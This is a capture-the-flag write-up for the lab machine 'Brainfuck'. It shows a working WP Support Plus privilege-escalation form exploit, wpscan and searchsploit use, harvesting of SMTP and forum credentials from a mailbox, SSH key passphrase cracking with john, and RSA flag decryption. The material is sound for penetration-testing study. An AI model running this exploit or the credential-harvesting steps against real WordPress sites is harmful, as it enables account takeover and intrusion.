Today we’re going to solve another CTF machine “Brainfuck”. It is now retired box and can be accessible if you’re a VIP member.

Introduction

Specifications

  • Target OS: Linux
  • Services: SSH, SMTP, POP3, IMAP, SSL
  • IP Address: 10.10.10.17
  • Difficulty: Hard

Weakness

  • Exploitation
  • RSA Decryption

Contents

  • Getting user
  • Getting root

Reconnaissance

As always, the first step consists of reconnaissance phase as port scanning.

Ports Scanning

During this step we’re gonna identify the target to see what we have behind the IP Address.

From the above screenshot we can observe many opened ports and we have DNS:www.brainfuck.htb, DNS:sup3rs3cr3t.brainfuck.htb subdomains on 443 Port.

Let’s point these domains to IP address on /etc/hosts

Now let’s access these domains and see what we can find.

https://brainfuck.htb/

https://sup3rs3cr3t.brainfuck.htb/

So we have two different CMS installed let’s enumerate both.

Enumerate WordPress

We have a wordpress installed at https://brainfuck.htb and if you take a look at first post there is a email address which we have to keep in mind because brainfuck has smtp and pop3 ports opened so this might comes handy.

[email protected]

Let’s run wpscan to see if we can find something interesting.

wpscan --url https://brainfuck.htb --disable-tls-checks

We found two users from wpscan “admin & administrator” and we have one plugin installed which is vulnerable to exploit.

searchsploit WP Support Plus

Exploitation

In our case we’re gonna test “WP Support Plus Responsive Ticket System 7.1.3 – Privilege Escalation”.

We have to modify our POST request in order to make it work.

<form method="post" action="http://wp/wp-admin/admin-ajax.php">
        Username: <input type="text" name="username" value="administrator">
        <input type="hidden" name="email" value="sth">
        <input type="hidden" name="action" value="loginGuestFacebook">
        <input type="submit" value="Login">
</form>

We know the email which we found in one of the article.

<form method="post" action="https://brainfuck.htb/wp-admin/admin-ajax.php">
        Username: <input type="text" name="username" value="admin">
        <input type="hidden" name="email" value="[email protected]">
        <input type="hidden" name="action" value="loginGuestFacebook">
        <input type="submit" value="Login">
</form>

We changed these values username: admin | email: [email protected] and the action url to https://brainfuck.htb.

Now to send a POST request we have to create a index.html and paste our modified exploit and run python HTTP server.

python -m SimpleHTTPServer 80

After clicking on login this comes up a blank white page.

Now just simply remove /wp-admin/admin-ajax.php from the url and go back to https://brainfuck.htb you will see the admin toolbar.

Getting reverse shell is easy through wordpress but we don’t have write access :/ so we have another challenge waiting for us to get to reverse shell.

After searching things i found another plugin installed which wpscan didn’t find i don’t know why but let’s take a look at it.

This is the information which we found at the smtp plugin settings.

If we inspect at the SMTP Password field we can see the password “kHGuERB29DNiNE“.

Since we found an SMTP password we can try connecting through: telnet 10.10.10.17 110 We was able to establish connection.

User: orestis Password: kHGuERB29DNiNE

After successfuly login we can use list command to display messages.

list
+OK 2 messages:
1 977
2 514

We can read them using retr command.

retr 1
+OK 977 octets
Return-Path: <[email protected]>
X-Original-To: [email protected]
Delivered-To: [email protected]
Received: by brainfuck (Postfix, from userid 33)
        id 7150023B32; Mon, 17 Apr 2017 20:15:40 +0300 (EEST)
To: [email protected]
Subject: New WordPress Site
X-PHP-Originating-Script: 33:class-phpmailer.php
Date: Mon, 17 Apr 2017 17:15:40 +0000
From: WordPress <[email protected]>
Message-ID: <[email protected]>
X-Mailer: PHPMailer 5.2.22 (https://github.com/PHPMailer/PHPMailer)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8

Your new WordPress site has been successfully set up at:

https://brainfuck.htb

You can log in to the administrator account with the following information:

Username: admin
Password: The password you chose during the install.
Log in here: https://brainfuck.htb/wp-login.php

We hope you enjoy your new site. Thanks!

--The WordPress Team
https://wordpress.org/

To read 2 message.

retr 2
+OK 514 octets
Return-Path: <[email protected]>
X-Original-To: orestis
Delivered-To: [email protected]
Received: by brainfuck (Postfix, from userid 0)
        id 4227420AEB; Sat, 29 Apr 2017 13:12:06 +0300 (EEST)
To: [email protected]
Subject: Forum Access Details
Message-Id: <[email protected]>
Date: Sat, 29 Apr 2017 13:12:06 +0300 (EEST)
From: [email protected] (root)

Hi there, your credentials for our "secret" forum are below :)

username: orestis
password: kIEnnfEKJ#9UmdO

Regards

If you take a look we found something interesting which is,

username: orestis password: kIEnnfEKJ#9UmdO

If you read the description of the second message it says credentials for “secret” forum 🙂 so let’s try login.

Let’s take a look at ‘Key‘ thread first.

Now take a look at ‘SSH Access’ thread.

Key‘ thread is encrypted somehow because if you take a look at the conversation between admin and orestis inside ‘SSH Access‘ thread orestis is asking admin for SSH key which he lost after that then orestis created another thread named it ‘Key‘ and there both admin and orestis talked about something which is not possible to understand.

It’s some kind of encryption which we don’t know yet. Since we don’t have any clue to decrypt the text let’s copy both threads text and place them under each to take a closer look.

We took both thread reply which was posted by orestis.

- Cipher Text 

Mya qutf de buj otv rms dy srd vkdof :)

Pieagnm - Jkoijeg nbw zwx mle grwsnn

- Plain Text

Go fuck yourself admin, I am locked out!! send me my key asap!

Orestis - Hacking for fun and profit

If you look closer.

- Cipher Text 

Pieagnm - Jkoijeg nbw zwx mle grwsnn

- Plain Text

Orestis - Hacking for fun and profit

We have to consider cipher text is encrypted information and plain text as a decrypting key.

Tool: http://rumkin.com/tools/cipher/vigenere.php

This is the output which we got!

Brainfu - Ckmybra inf uck myb rainfu

Let’s remove spaces and read it again 😉

BrainfuCkmybrainfuckmybrainfu

This is the decipher text we got.

And it you remember there’s a cipher text of url but there’s no decrypting key in ‘SSH Access‘ thread so that means we have to find another way to decrypt that.

Since we decrypted our first text and it keeps repeating a phrase ‘fuckmybrain‘ we can assume it can be a decrypting key for next encrypted cipher.

And we got an actual URL for id_rsa key 🙂

We found a key but upon opening it we found that it is locked.

There’s a tool called john the ripper which we’ll use to crack the password. We cannot directly crack the id_rsa key we have to first convert it into john the ripper format.

Upon doing research you’ll find a tool called: sshng2john.py

python sshng2john.py id_rsa > ssh_key

Now we’re ready to crack the password.

john ssh_key --wordlist=/usr/share/wordlists/rockyou.txt

And after few seconds we got the password: 3poulakia!

Let’s try to login to SSH using a key and password.

ssh -i id_rsa [email protected]

Privilege Escalation

Now that we have found our user.txt flag we’re going after root.txt. Apart from user.txt we found another 3 uncommon files inside /home/orestis/ debug.txt, encrypt.sage, output.txt

Since we don’t know what’s inside those files so i reached Google for answers and i found a RSA Decryption tools.

http://dann.com.br/alexctf2k17-crypto150-what_is_this_encryption/

https://crypto.stackexchange.com/questions/19444/rsa-given-q-p-and-e/19530#19530

It appears that the file output.txt file contains an encrypted root flag and the file debug.txt contains the P, Q and E values used to do the encryption. By using the above tool it is possible to decrypt the ciphertext and get the root flag.

After running the script we found our root.txt flag.